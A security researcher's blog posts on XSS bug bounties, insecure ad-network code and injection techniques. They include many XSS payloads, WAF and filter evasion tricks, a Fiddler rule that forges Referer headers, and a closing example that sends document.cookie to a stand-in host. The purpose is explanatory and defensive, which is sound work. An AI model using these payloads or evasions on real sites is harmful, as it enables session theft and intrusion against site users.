Sometimes it's just my job to find vulnerabilities, and while that's kind of fun, it's also a little unexciting compared to the thrill of finding bugs in other people's software and getting an actual "thank you", whether monetary or just a brief word.
About a year ago, I found a minor Cross-Site Scripting (XSS) flaw in a major company's web page, and while it wasn't a huge issue, I decided to report it, as I had a few years back with a similar issue on the same web site. I was pleased to find that the company was offering a bounty programme, and that simply emailing them would submit my issue.
The first thing to note, as with all XSS issues, is that there were protections in place that had to be got around. In this case, some special characters and sequences were being blocked - but not all. It's telling that so many websites still haven't implemented thorough input validation and output encoding as their XSS protection, relying on a WAF instead. The WAF here slowed me down even though I knew the flaw existed, but it only added about 20 minutes to the exploit time: my example had to use "confirm()" instead of "alert()" or "prompt()". But really, if I were an attacker, my exploit wouldn't use any of those functions, and would probably carry an encoded script that the WAF couldn't detect either. WAFs are great at preventing specific, known attacks, but they aren't a strong protection against an adversary with a little intelligence and understanding.
My email resulted in an answer that same day, less than an hour after my initial report. A simple "thank you" and "we're forwarding this to our developers" goes a long way towards keeping a security researcher from idly toying with the thought of publishing their findings and moving on to the next game.
In under a week, I found that the original demo exploit was being blocked by the WAF - but if I replaced "onclick" with "oclick", "onmouseover" with "omouseover", and "confirm" with "cofirm", the blocking didn't get in the way. Granted, since those aren't real event handlers or JavaScript functions, I can't use them in a real exploit, but it does mean that once again the WAF blocks only the original example of the attack, and it took just a few minutes to come up with another working exploit string.
If they'd told me "hey, we're putting in a WAF rule while we work on fixing the actual bug", I wouldn't have been so eager to grump back at them, point out that applying a WAF rule hadn't fixed the issue, and hand them another URL that exploited it. But they did at least respond to my grump and reassure me that, yes, they were still going to fix the application.
I heard nothing after that until February of this year, over six months later, when I replied to the original thread and asked if the report qualified for a bounty, since I'd noticed that they had actually fixed the vulnerability.
No response. I started thinking of writing this up as an example of how security researchers still get shafted by businesses. Bear in mind that my approach is not to seek out bounties for reward; I simply think it's common courtesy to thank researchers for reporting to you, rather than pwning your website and/or your customers.
About a month later, while looking into other things, I found that the company exists on HackerOne, where they run a bug bounty. This renewed my interest in seeing the issue resolved. So I reported the earlier email exchange, noted that the bug was fixed, and asked if it constituted a rewardable finding. Again, a simple "thanks for the report, but this doesn't really rise to the level of a bounty" is something I've been comfortable hearing from many companies (though it is nice when you do get something, even if it's just a keychain, a t-shirt, or a bag full of stickers).
3/14: I got a reply the next day, indicating that "we are investigating".
3/28: Then nothing for two weeks, so I posted another response asking where things were going.
4/3: A week later, a response: "We're looking into this and will be in touch soon with an update."
4/18: Me: Ping?
5/7: Me: Hey, how are we doing?
5/16: Anything happening?
5/18: Finally, over two months after my report to the company through HackerOne, and ten months after my original email to the first bug bounty address, it's addressed.
5/19: The severity of the bug report is lowered (quite rightly; the questionnaire they used pushed me to a priority of "high", which was by no means warranted). A very welcome bounty, and a bonus for my patience, unexpected but appreciated, are issued.
The cheapest way to learn things is from someone else's mistakes, so I decided to share with my readers the things I picked up from this experience.
Here are a few other lessons I've picked up from bug bounties I've observed:
If you start a bug bounty, consider how ready you are. Are you already fixing all the security bugs you can find for yourself? Are you at least fixing those bugs faster than you can find more? Do your developers actually know how to fix a security bug, or how to verify a vulnerability report? Do you know how to expand on an exploit, and find other occurrences of the same class of bug? [If you don't, someone will milk your bounty programme by continually filing variations on the same basic flaw.]
How many security vulnerabilities do you think you have? Multiply that by an order of magnitude or two. Now multiply that by the average bounty you expect to offer. Add the cost of the personnel who will handle incoming bugs, and the cost of the projects they could otherwise be engaged in. Add the cost of the developers whose work will be interrupted to fix security bugs, and the cost of the features that didn't ship on time as a result. Sure, some of that is just a normal cost of doing business - a security report can come at you out of the blue and interrupt development until it's fixed - but starting a bug bounty paints a huge target on you.
Hiring a penetration tester, or renting a tool to scan for programming flaws, has a fixed cost: you can simply tell them how much you're willing to pay, and they'll work for that long. A bug bounty may result in orders of magnitude more findings than you expected. Are you going to pay them all? What happens when your bounty programme runs out of money?
Finding bugs internally, using bug bashes, software scanning tools or dedicated development staff, also has a fixed cost, which is probably still smaller than the amount of money you're considering putting into that bounty programme.
That's not to say bug bounties are always going to be uneconomical. At some point, in theory at least, your development staff will be sufficiently good at resolving and preventing the security vulnerabilities discovered internally that they will run short of security bugs to fix. Such bugs still exist, of course, but they're more complex and harder to find. This is where it becomes economical to lure a bunch of suckers - excuse me, security researchers - to pound against your brick walls until one of them, either stronger or smarter than the others, finds the open window nobody saw, and reports it to you. And you give them a few hundred bucks - or a few thousand, if it's a really good find - for the time that they and their friends spent hammering away in futility until that one successful exploit.
At that point, your bug bounty programme is actually the least expensive tool in your arsenal.
Randy Westergren posted a really great piece entitled "Widespread XSS Vulnerabilities in Ad Network Code Affecting Top Tier Publishers, Retailers".
Go read it - I'll wait.
The article triggered a number of thoughts that I'll enumerate here:
This was reported by SoftPedia as a "new attack", but it's really an old attack - just another way to execute DOM-based XSS.
That means that web sites are being attacked by old bugs, not because their own coding is bad, but because they choose to make money from advertising.
And because the advertising industry is just waaaay behind on securing its code, despite effectively being a widely-used framework across the web.
You've seen previously on my blog how I attacked Troy Hunt's blog through his advertising provider, and he's not the first, nor by any means the last, "victim" of my occasional searches for flaws.
It's often difficult to trace which ad provider is responsible for a piece of vulnerable code, and the hosting site may not realise the nature of their relationship and its impact on security. As a security researcher, it's difficult to get traction on getting these vulnerabilities fixed.
Important note
I'm trying to get one ad provider right now to fix their code. I reported a bug to them, and they pointed out that it was similar to the work Randy Westergren had written up.
So they are aware of the problem.
It's over a month later, and the sites I pointed out to them as proofs of concept are still vulnerable.
Partly, this is because I couldn't initially get a reliable repro as different ad providers loaded up, but it's been two weeks since I sent them a reliable repro - which is still working.
Reported a month ago, reliable repro two weeks ago, and still vulnerable everywhere.
[If you're defending a site and want to figure out which ad provider is at fault, inject a "debugger" statement into the payload, to have the debugger break at the line that's causing the problem. You may need to do this by replacing "prompt()" or "alert()" with "(function(){debugger})()" - note that it'll only break into the debugger if you have the debugger open at the time.]
Randy's attack example uses a symbol you won't see at all in some web sites, but which you can't get away from in others: the "#" or "hash" symbol, also known as the "number" sign. [Don't call it "pound", please; that's a different symbol altogether, "£".] Here's his example:
http://nypost.com/#1'-alert(1)-'"-alert(1)-"
Different parts of the URL have different names. The "http:" part is the "protocol", which tells the browser how to connect and what commands will likely work. "//nypost.com/" is the host part, and tells the browser where to connect. Sometimes a port number is used - commonly 80 or 443 - after the host name but before the terminating "/" of the host element. Anything after the host part, and before a question mark or hash sign, is the "path"; in Randy's example the path is left out, indicating he wants the root page. An optional "query" part follows the path, indicated by a question mark at its start, and often takes up the rest of the URL. Finally, if a "#" character is encountered, it starts the "anchor" part (formally, the "fragment"), which runs from after the "#" character to the end of the URL.
The "anchor" has a couple of purposes, one by design and one by evolution. The designed use is to tell the browser where to place the cursor - where to scroll to. I find this really handy when I want to draw someone's attention to a particular place in an article, rather than have them read the whole story. [It can also be used to trigger an onfocus event handler in some browsers.]
The second use is for communication between components on the page, or even on other pages loaded in frames.
I want to emphasise this - and while Randy also mentioned it, I think many web site developers need to understand it when dealing with security.
The anchor tag is not sent to the server.
The anchor tag does not appear in your server's logs.
WAFs cannot filter the anchor tag.
If your site is being attacked through abuse of the anchor tag, you not only can't detect it ahead of time, you can't even do basic forensic work to find out useful things such as "when did the attack start", "what sort of things was the attacker doing", "how many attacks happened", and so on.
[Caveat: pedants will note that when browser code acts on the contents of the anchor tag, some of that action may go back to the server. That's not the same as finding the bare URL in your log files.]
If you have an XSS that can be triggered by code in an anchor tag, it is a "DOM-based XSS" flaw. This means that the exploit happens primarily (or only) in the user's browser, and no filtering on the server side, or in the WAF (a traditional, but often unreliable, measure against XSS attacks), will protect you.
When trying out XSS attacks to find and fix them, you should try attacks in the anchor tag, in the query string, and in the path elements of the URL if at all possible, because each gets parsed in different ways, and each will demonstrate different bugs.
The construction Randy uses may seem a little odd:
"-alert(1)-"'-alert(1)-'
With some experience, you can look at this and note that it's an attempt to inject JavaScript, not HTML, into a quoted string whose injection point doesn't properly (or at all) escape quotes. The two different quote styles will escape from strings quoted with double quotes and single quotes alike. (I like to put the number "2" in the alert that is escaped by the double quotes, so I know which quote got me out.)
Surely it's invalid syntax?
While JavaScript knows that "string minus void" isn't a valid operation, in order to discover the types of the two arguments to the "minus" operator, it actually has to evaluate them. This is a usual side-effect of a dynamic language: in order to determine whether an operation is valid, its arguments have to be evaluated. Compiled languages are usually able to identify specific types at compile time, and tell you when you have an invalid operand.
So, now that we know you can use any operator in there - minus, times, plus, divide, and, or, etc. - why choose the minus? Here's my reasoning: a plus sign in a URL is converted to a space. A divide ("/") is often a path component, and, like multiplication ("*"), forms part of a JavaScript comment sequence ("//" or "/*"). An "&" is often used to separate arguments in a query string, and a "|" for "or" may trigger different flaws, such as command injection, and so is best saved for later.
Also, the minus sign is an unshifted character and quick to type.
There are so many other ways to exploit this - finishing the alert with a line-ending comment ("//" or "<!--"), using "prompt" or "confirm" instead of "alert", using JavaScript obfuscators, etc. - but this is a really good, easy injection point.
Another JavaScript syntax abuse is simply to drop "</script>" in the middle of the JavaScript block and then start a new script block, or even just regular HTML. Remember that the HTML parser only hands off to the JavaScript parser once it has found a block between "<script ...>" and "</script ...>" tags. It doesn't matter if the closing tag is "within" a JavaScript string, because the HTML parser doesn't know JavaScript.
Part of the challenge in repeating these attacks, demonstrating them to others, and so on, is that there's no single ad provider, even on an individual web site.
Two visits to the same web site not only bring back different adverts, they come through different pieces of code, injected in different ways.
If you don't capture your successful attack, it may not be possible to reproduce it.
Similarly, if you don't capture a malicious advert, it may not be possible to prove who provided it to you. I ran into this today with a "fake BSOD" malvert, which pretended to be describing a system error, filled as much of my screen as it could with a large "alert" dialog that returned immediately whenever it was dismissed, and invited me to call "tech support" to fix my system. Sadly, I wasn't tracing my every move, so I didn't get a chance to discover how this ad was delivered, and could only rage at the company hosting the page.
Clearly, ad providers need to improve their security. Until such time as they do, a great protection is to use an ad-blocker. This may prevent you from seeing actual content at some sites, but you have to ask yourself whether that content is worth the security risk of exposing yourself to adverts.
There is a valid argument to be made that ad blockers reduce the ability of content providers to make legitimate profit from their content.
But there is also a valid argument that ad blockers protect users from insecure adverts.
Finally, if you're running a web site that makes its money from ads, you need to behave proactively to prevent your users from being targeted by rogue advertisers.
I'm sure you believe that you have a strong, trusting relationship with the ad providers running ads on your web site.
Don't trust them. They are not a part of your dev team. They see your customers as livestock - product. Your goals are substantially different, and that means you shouldn't allow them to write code that runs in your web site's security context.
What this means is that you should always embed those advertising providers inside an iframe of their own. If they give you code to run, and tell you it's to create the iframe in which they'll sit, put that code in an iframe you host on a domain outside your main domain. Because you don't trust that code.
Why am I suggesting you do that? Because it's the difference between allowing an advert attack limited control, and allowing it complete control, over your web site.
If I attack an ad in an iframe, I can modify the contents of the iframe, I can pop up a global alert, and I can send the user to a new page.
If I attack an ad - or its loading code - and it isn't in an iframe, I can still do all of that, but I can also modify the entire page, read secret cookies, insert my own cookies, interact with the user as if I am the site hosting the ad, and so on.
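As a minimal sketch of that isolation (ads.example.net here is a hypothetical throwaway domain you control, and ad-slot.html a hypothetical loader page):

```html
<!-- The ad loader lives on a separate domain, inside a sandboxed iframe,
     so any script it runs stays out of your main site's security context. -->
<iframe src="https://ads.example.net/ad-slot.html"
        sandbox="allow-scripts"
        width="300" height="250"></iframe>
```

Omitting allow-same-origin from the sandbox list keeps the frame in an opaque origin, so scripts inside it can't even read the throwaway domain's own cookies, let alone yours.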
Here's the front page of a major website with a short script running through an advert with a bug in it.
[I like the tag at the bottom left]
Add security clauses into your contracts, so that you can pull an ad provider immediately when a security vulnerability is reported to you, and so that the ad providers are aware that you have an interest in the security and integrity of your page and your users. Ask for information on how they enforce security, and how they expect you to securely include them in your page.
[I am not a lawyer, so please talk with someone who is!]
"Malverts" - malicious advertising - is the term for an attacker getting an ad provider to deliver their attack code to your users, by signing up to provide an ad. Often this is done using apparent advertising copy related to current advertising campaigns, and it can look incredibly legitimate. Sometimes the attack code will be delayed, or region-specific, so an ad provider can't easily notice it when they review the campaign for inclusion in your web page.
Got a virus you want to distribute? Why write distribution code and try to trick a few people into running it when, for a few dollars, you can get an ad provider to distribute it for you to several thousand people on a popular web site aimed at people who have money?
There are many reasons why Information Security hasn't had as big an impact as it deserves. Some are external: lack of funding, lack of concern, poor management, distractions from valuable tasks, and so on.
But the ones we inflict on ourselves are probably the most irritating. They make me really cross.
We shoot ourselves in the foot by confusing our customers between Cross-Site Scripting, Cross-Site Request Forgery & Cross-Frame Scripting.
- Alun Jones (@ftp_alun) February 26, 2016
OK, "cross" is an English term for "angry" or "irate", but as with many other English words, it has a few other meanings as well.
It can mean to wrong someone, or go against them: "I can't believe you crossed Fingers MacGee."
It can mean to make the sign of a cross: "Did you just cross your fingers?"
It can mean a pair of items intersecting one another: "I'm drinking at the sign of the Skull and Cross-bones."
It can mean to breed two different subspecies into a third: "What do you get if you cross a mountaineer with a mosquito? Nothing, you can't cross a scaler and a vector."
Or it can mean to traverse something: "I don't care what Darth Vader says, I always cross the road here."
It's this last sense that InfoSec people seem obsessed with, to the extent that every other attack seems to require it as its first word.
These are just the attacks listed at OWASP that begin with the word "Cross".
Yesterday I had a meeting to discuss how to address three bugs found in a scan, and I swear I spent more than half the meeting trying to ensure that the PM and the developer in the room were discussing the same bug. [And here, I paraphrase.]
"How long will it take you to fix the Cross-Frame Scripting bug?"
"We just told you, it's going to take a couple of days."
"No, that was for the Cross-Site Scripting bug. I'm talking about the Cross-Frame Scripting issue."
"Oh, that should only take a couple of days, because all we need to do is encode the contents of the field."
"No, again, that's the Cross-Site Scripting bug. We already discussed that."
"I wish you'd make it clear what you're talking about."
Yeah, me too.
The whole point of the word "Cross", as used in the descriptions of these bugs, is to indicate that someone is doing something they shouldn't - and in that respect, it's a pretty much completely irrelevant word, because we're already discussing attack types.
In many of these cases, the words "Cross-Site" bring absolutely nothing to the discussion, and just make things confusing. Am I crossing a site from one page to another, or am I saying this attack occurs between sites? What if there's no other site involved - is that still a cross-site scripting attack? [Yes, but that's an irrelevant question, and by asking it, or thinking about asking or answering it, you've reduced the mental processing available for the actual issue.]
Check yourself when you utter "cross" as the first word in the description of an attack, and ask whether you're communicating something of use, or just "sounding like a proper InfoSec tool". Consider whether there's a better term to use.
I've previously argued that "Cross-Site Scripting" is really a poor term for the conflation of HTML Injection and JavaScript Injection.
Cross-Frame Scripting is really Clickjacking (and yes, that doesn't exclude clickjacking activities done by a keyboard or other non-mouse source).
Cross-Site Request Forgery is more of a Forced Action: an attacker can guess what URL would cause an action without further user input, and can cause a user to visit that URL in a hidden manner.
Cross-Site History Manipulation is more of a browser failure to protect the Same Origin Policy (SOP). I'm not an expert in that field, so I'll leave it to the experts to figure out a non-confusing name.
Cross-Site Tracing is just getting silly: it's Cross-Site Scripting (excuse me, HTML Injection) using the TRACE verb instead of the GET verb. If you allow TRACE, you've got bigger problems than XSS.
Cross-User Defacement crosses all the way into crosstalk, requiring as it does that two users share the same TCP connection with no adequate delineation between them. This isn't really common enough to need a name that gets capitalised. It's HTTP Response Splitting over a shared proxy with shitty user segregation.
I don't remotely anticipate that I'll change the names people give to these vulnerabilities in scanning tools or in pen-test reports.
But I do hope you'll be able to use these to stop confusion in its tracks, as I did:
"Never mind cross-whatever, let's talk about how long it's going to take you to address the clickjacking issue."
Here's the TL;DR version of the post:
Prevent or interrupt confusion by referring to bugs using the following non-confusing terms:
| Confusing | Not Confusing Much, Probably |
| --- | --- |
| Cross-Frame Scripting | Clickjacking |
| Cross-Site History Manipulation | [Not common enough to name] |
| Cross-Site Tracing | TRACE is enabled |
| Cross-Site Request Forgery | Forced User Action |
| Cross-Site Scripting | HTML Injection / JavaScript Injection |
| Cross-User Defacement | Crappy proxy server |
Apologies for not having written one of these in a while, but I find that one of the challenges here is not to release details about vulnerable sites while they're still vulnerable - and it can take oh, so long for web developers to get around to fixing these vulnerabilities.
And when they do, often there's more work to be done, as the fixes are incomplete, incorrect, or occasionally worse than the original problem.
Sometimes, though, the time goes so slowly, and the world moves on in such a way, that you realise nobody's looking for the vulnerable site, and publishing details of its flaws without publishing details of its identity should be completely safe.
So, what sort of attack is actively aided by the website?
My favourite "helped by the website" issues are error messages which politely inform you how your attack failed, and occasionally what you can do to fix it.
Here's an SQL example:
OK, so now I know I have a SQL statement that contains the sequence "' order by type asc, sequence desc" - and that tells me quite a lot. There are two fields called "type" and "sequence". And my single injected quote was enough to demonstrate the presence of SQL injection.
What about XSS help?
There are a few web sites out there which will help you by telling you which characters they can't handle in their search fields:
Now the question isn't "what characters can I use to attack the site?", but "how do I get those characters into the site?" [Usually it's as simple as typing them into the URL instead of using the text box; sometimes it's simply a matter of encoding.]
On the subject of encoding and decoding, I generally advise developers to document the interface contracts between modules in their code, describing what the data is, what format it's in, and what isomorphic mapping they have used to encode the data, so that it cannot be confused with its surrounding delimiters or code, and so that it's possible to get the original string back.
An isomorphism, or 1:1 ("one to one") mapping, in data-encoding terms, is a means of making sure that each output can correspond to only one possible input, and vice versa.
Without these contracts, you find that developers are aware that data sometimes arrives in an encoded fashion, and they will do whatever it takes to decode it. Data arrives encoded? Decode it. Data arrives doubly encoded? Decode it again. Heck, take the easy way out, as this section of code did:
var input, output;
var parms = document.location.search.substr(1).split("&");
input = parms[1];
// Keep decoding until the string stops changing:
while (input != output) {
    output = input;
    input = unescape(output);
}
[That's from memory, so I apologise if it's a little incorrect in many, many other ways as well.]
Yes, the programmer had decided to decode the input string until he got back a string that was unchanged.
This meant that an attacker could simply provide a multiply-encoded attack sequence which gets past any filters you have, such as WAFs and the like, and which the application happily decodes for you.
Granted, I don't think WAFs are much good compared to actually fixing the code, but they can give you a moment's peace in which to fix the code, as long as your application doesn't do things that actively prevent the WAF from being able to help.
This has essentially the same effect as described above. The request target for an HTTP request may be percent-encoded, and when it is, the server is required to treat it equivalently to the decoded target. This can sometimes have the effect that each server in a multi-tiered service will decode the HTTP request once, achieving the multiple-decode WAF traversal I talk about above.
OK, that's illustrative, and it illustrates that Google doesn't fall for this crap.
But it's interesting how you'll occasionally find that such a correction results in executing code.
When finding XSS in searches, we often concentrate on failed searches - after all, in most product catalogues there isn't an item called "<script>prompt()</script>" - unless we put it there on a previous attack.
But often the more complex (and more easily attacked) code is in the successful search results, so we want to trigger that page.
Sometimes there's something called "script", so we squeak that by (there's a band called "The Script", and very often writing on things is described as being in a "script" font), but now we have to build JavaScript with other terms that match the item on display when we search for "script". Fortunately, there's a list of words that most search engines are trained to ignore: they are called "stopwords". These are words that don't impact the search at all, such as "the", "of", "to", "and", "by", etc. - words that occur in such a large number of matching items that it makes no sense to let people search on them. Often colours will appear in the list of stopwords, along with generic descriptions of items in the catalogue ("shirt", "book", etc.).
Well, "alert" is simply "and"[0]+"blue"[1]+"the"[2]+"or"[1]+"the"[0], so you can build function names quickly from stopwords. Once you have String.fromCharCode as a function object, you can create many more strings and functions much more quickly. For an extreme example of this kind of "building JavaScript from minimal characters", see this page on how to create all JavaScript from eight basic characters (none of which are alphabetical!).
"Notwords" aren't a thing, but they made the title seem more interesting. Sometimes it'd be nice to slip in a string that isn't a stopword, and isn't going to be found in the search results. Well, many search functions have a grammar that allows us to say things like "I'd like all your teapots except for the ones made from steel" - or, more briefly, "teapot !steel".
How does this help us execute an attack?
Well, we could just as easily search for "<script> !prompt() </script>" - valid JavaScript syntax, which means "run the prompt() function, and return the negation of its result". Well, too late: we've already run our prompt command (or other commands). I even had "book !<script> !prompt()// !</script>" work on one occasion.
So, now that we've seen some examples of the server or its application helping us to exploit an XSS, what about the browser?
One of the fun things I see a lot is servers blocking XSS by ensuring that you can't enter a complete HTML tag, except for the ones they approve of.
So, if I can't put that closing ">" in my attack, what am I to do? I can't just leave it out.
Well, strange things happen when you do. Largely because most web pages are already littered with closing angle brackets; they're designed to close other tags, of course, not the one you've put in, but there they are anyway.
So, you inject "<script>prompt()</script>" and the server refuses you. You try "<script prompt() </script" and it's allowed, but can't execute.
So, instead, try a single tag, like "<img src=x onerror=prompt()>". It's rejected, because it's a complete tag, so just drop off the terminating angle bracket: "<img src=x onerror=prompt()". Then, so that the next tag doesn't interfere, add an extra space, or an "x=":
<img src=x onerror=prompt() x=
If that gets injected into a <p> tag, it'll appear as this:
<p><img src=x onerror=prompt() x=</p>
How's your browser going to interpret that? Simple: open p tag, then an img tag with src=x, onerror=prompt(), and some attribute called "x" whose value is "</p".
Occasionally, browser heuristics and documented standards will be just as helpful to you as the presence of characters in the web page.
Can't get a "/" character into the page? Then you can't close a <script> tag. Well, that's OK, because the <svg> tag can include scripts, and is documented to end at the next HTML tag that isn't valid in SVG. So... "<svg><script>prompt()<p>" will happily execute as if you'd provided the complete "<svg><script>prompt()</script></svg><p>".
There are many other examples where the browser will use some form of heuristic to "guess" what you meant - or rather, to guess what the server meant with the code it sends to the browser along with your injected data. See what happens when you leave your attack half-closed.
When injecting script, you often want to comment the remaining line after your injection, so it isnât parsed â a failing parse results in none of your injected code being executed.
So, you try to inject â//â to make the rest of the line a comment. Too bad, all â/â characters are encoded or discarded.
Well, did you know that JavaScript in HTML treats â<!ââ as a perfectly valid equivalent?
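If you want to convince yourself of this, Annex B of the ECMAScript specification requires engines to treat "<!--" like a single-line comment in classic (non-module) scripts. A minimal sketch you can run in Node or a browser console – the eval here is purely for demonstration:

```javascript
// In sloppy-mode, non-module code, "<!--" behaves like "//",
// so everything after it on the same line is a comment.
const result = eval('<!-- this whole line is a comment\n40 + 2');
console.log(result); // 42
```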
Try attacks in different browsers; they each behave in subtly different ways.
Firefox doesn't have an XSS filter, so it won't prevent XSS attacks that way.
IE 11 doesn't encode URI elements, so your attack will sometimes work there when it would otherwise be encoded.
Chrome – well, I don't use Chrome often enough to comment on its quirks. Too irritated with it trying to install on my system through Adobe Flash updates.
Well, I think that's enough for now.
My buddy Troy Hunt has a popular PluralSight training class called "Hack Yourself First". This is excellent advice, as it addresses multiple ideas:
Plenty of other reasons, I'm sure. Maybe I should watch his training.
Every now and again, though, I'll hack my friends as well. There are a few reasons for this, too:
Such is the way with my recent visit to troyhunt.com – I've been researching reflected XSS issues caused by including script in the Referrer header.
Actually, there are two places that hold the referrer, and it's important to know the difference between them, because they get attacked in different ways, and attacks can be simulated in different ways.
The Referrer header (actually misspelled as "Referer") is an HTTP header that the browser sends as part of its request for a new web page. The Referrer header contains a URL to the old page that the browser had loaded and which triggered the browser to fetch the new page.
There are many rules as to when this Referrer header can, and can't, be sent. It can't be sent if the user typed a URL. It can't be sent if the target is HTTP, but the source was HTTPS. But there are still enough places it can be sent that the contents of the Referer header are a source of significant security concern – and why you shouldn't EVER put sensitive data in the URL or query parameters, even when sending to an HTTPS destination. Even when RESTful.
Forging the Referer when attacking a site is a simple matter of opening up Fiddler (or your other favourite scriptable proxy) and adding a new automatic rule to your CustomRules.js, something like this:
// AMJ
if (oSession.oRequest.headers.Exists("Referer"))
{
    // Append the XSS probe to an existing Referer, respecting any query string
    if (oSession.oRequest.headers["Referer"].Contains("?"))
        oSession.oRequest.headers["Referer"] += "&\"-prompt()-\"";
    else
        oSession.oRequest.headers["Referer"] += "?\"-prompt()-\"";
}
else
    // No Referer present -- forge one carrying the probe
    oSession.oRequest.headers["Referer"] = "http://www.example.com?\"-prompt()-\"";
Something like this code was in place when I visited other recently reported vulnerable sites, but Troy's I hit manually. Because fun.
The other referrer is in JavaScript, the document.referrer field. I couldn't find any rules about when this is, or isn't, available. That suggests it's available for use even in cases where the HTTP Referer header believes it is not safe to do so, at least in some browser or other.
Forging this is harder, and I'm not going to delve into it. I want you to know about it in case you've used the Referer header, and referrer-vulnerable code isn't triggering. Avoids tearing your hair out.
So, lately I've been testing sites with a URL ending in the magic string ?"-prompt()-"
– and happened to try it at Troy's site, among others.
I'd seen a pattern of adsafeprotected.com advertising being vulnerable to this issue. [It's not the only one by any means, but perhaps the most prevalent.] It's difficult to reproduce this issue accurately, because advertising mediators will send you to different advertisers each time you visit a site.
And so it was with great surprise that I tried this on Troy's site and got an immediate hit. Partly because I know Troy will have already tried this on his own site.
Through a URL parameter, I'm injecting script into a hosted component that unwisely includes the Referer header's contents in its JavaScript without encoding and/or quoting it first.
I hear that one all the time – no big deal, it's only a reflected XSS, the most you can do with this is to abuse yourself.
Kind of, yeah. Here are some of my reasons why Reflected XSS is important:
So, for multiple values of "self" outside the attacker, you can abuse yourself with Reflected XSS.
With all security research, there comes a time when you want to make use of your findings, whether to garner yourself more publicity, or to earn a paycheck, or simply to notify the vendor and have them fix something. I prefer the latter, when it's possible / easy.
Usually, the key is to find an email address at the vulnerable domain – but security@adsafeprotected.com wasn't working, and I couldn't find any hints of an actual web site at adsafeprotected.com for me to go look at.
Troy was able to start from the other direction – as the owner of a site showing these adverts, he contacted the advertising agent that puts ads onto his site, and got them to fix the issue.
"Developer Media" was the name of the group, and their guy Chris quickly got onto the issue, as did Jamie from Integral Ads, the owners of adsafeprotected.com. Developer Media pulled adsafeprotected as a source of ads, and Integral Ads fixed their code.
Sites that were previously vulnerable are now not vulnerable – at least not through that exact attack.
I count that as a win.
Finally, some learning.
Your partners can bring you as much risk as your own developers and your own code. You may be able to transfer risk to them, but you can't transfer reputational risk as easily. With different notifications, Troy's brand could have been substantially damaged, as could Developer Media's and Integral Ads'. As it is, they all responded quickly, quietly and appropriately, reducing the reputational impact.
[As for my own reputational impact – you're reading this blog entry, so that's a positive.]
This issue was easy to find. So it's probably been in use for a while by the bad guys. There are issues like this at multiple other sites, not related to adsafeprotected.
So you should test your site and see if it's vulnerable to this, or similar, code. If you don't feel like you'll do a good job, employ a penetration tester or two.
There's a thin line between "paranoia" and "good security practice". Troy's blog uses good security practice, by ensuring that all adverts are inside an iframe, where they can't execute in Troy's security context. While I could redirect his users, perhaps to a malicious or competing site, I wasn't able to read his users' cookies, or modify content on his blog.
There were many other hosts using adsafeprotected without being in an iframe.
Make it a policy that all externally hosted content (beyond images) is required to be inside of an iframe. This acts like a firewall between your partners and you.
If you're a developer, you need to have a security contact, and that contact must be findable from any angle of approach. Security researchers will not spend much time looking for your contact information.
Ideally, for each domain you handle, have the address security@example.com (where you replace "example.com" with your domain) point to a monitored email address. This will be the FIRST thing a security researcher will try when contacting you. Finding the "Contact Us" link on your web page and filling out a form is farther down on the list of things a researcher will do. Such a researcher usually has multiple findings they're working on, and they'll move on to notifying someone else rather than spend time looking for how to notify you.
This just makes it more ironic when the inevitable vulnerability is found.
As Troy notes, I did have to disable the XSS Filter in order to see this vuln happen.
That doesn't make the vuln any less important to fix – all it means is that to exploit it, I have to find customers who have also disabled the XSS Filter, or find a way to evade the filter.
There are many sites advising users how to disable the XSS Filter, for various (mostly specious) reasons, and there are new ways every day to evade the filter.
The web ad industry is at a crisis point, from my perspective.
Flash has what appear to be daily vulnerabilities, and yet it's still seen to be the medium of choice for online advertising.
Even without vulnerabilities in Flash, its programmability lends it to being used by bad guys to distribute malicious software. There are logic-based and time-based exploits (display a "good" ad when inspected by the ad hosting provider; display a bad ad, or do something malicious, when displayed on customers' computers) which attackers will use to ensure that their ad passes rigorous inspection, but still deploys bad code to end users.
Any ad that uses JavaScript is susceptible to common vulnerability methods.
Ad blockers are being run by more and more people – even institutions (one college got back 40% of their network bandwidth by employing ad blocking).
Web sites need to be funded. If you're not paying for the content, someone is. How is that to be done except through advertising? [Maybe you have a good idea that hasn't been tried yet.]
I'll admit, I was bored when I found the bug on Troy's site on a weekend. I decided to contact him straight away, and he responded immediately.
This led to Developer Media being contacted late on a Sunday.
This is not exactly friendly of me and Troy – but at least we didn't publish, and left it to the developers to decide whether to treat this as a "fire drill".
A good reason, indeed, to use responsible / coordinated disclosure, and make sure that you don't publish until teams are actively working on / have resolved the problem.
There are people using old and poorly configured browsers everywhere. Perhaps they make up 0.1% of your users. If you have 100,000 users, that's a hundred people who will be affected by issues with those browsers.
Firefox escaped because it encoded the quote characters to %22, and the server at adsafeprotected didn't decode them. Technically, adsafeprotected's server is not RFC compliant because of this, so Firefox isn't really protecting anyone here.
Chrome escaped because it encoded the quote characters AND has an XSS filter to block things like my attack. This is not 100% safe, and can be disabled easily by the user.
Internet Explorer up to version 11 escaped if you leave the XSS Filter turned on.
Microsoft Edge in Windows 10 escaped because it encodes the quote characters and has a robust XSS Filter that, as far as I can tell, you can't turn off.
All these XSS filters can be turned off by setting a header in network traffic.
Nobody would do that.
Until such time as one of these browsers has a significant flaw in their XSS filter.
So, don't rely on the XSS Filter to protect you – it can't be complete, and it may wind up being disabled.
First, a disclaimer for the TL;DR crowd – data attributes alone will not stop all XSS, mine or anyone else's. You have to apply them correctly, and use them properly.
However, I think you'll agree with me that it's a great way to store and reference data in a page, and that if you only handle user data in correctly encoded data attributes, you have a greatly-reduced exposure to XSS, and can actually reduce your exposure to zero.
Next, a reminder about my theory of XSS – that there are four parts to an XSS attack – Injection, Escape, Attack and Cleanup. Injection is necessary and therefore can't be blocked, Attacks are too varied to block, and Cleanup isn't always required for an attack to succeed. Clearly, then, the Escape is the part of the XSS attack quartet that you can block.
Now let's set up the code we're trying to protect – say we want to have a user-input value accessible in JavaScript code. Maybe we're passing a search query to Omniture (by far the majority of JavaScript Injection XSS issues I find). Here's how it often looks:
<script>
s.prop1="mysite.com";
s.prop2="SEARCH-STRING";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
s_code=s.t();
if(s_code)
document.write(s_code)//-->
</script>
Let's suppose that "SEARCH-STRING" above is the string for which I searched.
I can inject my code as a search for:
"-window.open("//badpage.com/"+document.cookie,"_top")-"
The second line then becomes:
s.prop2=""-window.open("//badpage.com/"+document.cookie,"_top")-"";
Yes, I know you can't subtract two strings, but JavaScript doesn't know that until it's evaluated the window.open() function, and by then it's too late, because it's already executed the bad thing. A more sensible language would have thrown an error at compile time, but this is just another reason for security guys to hate dynamic languages.
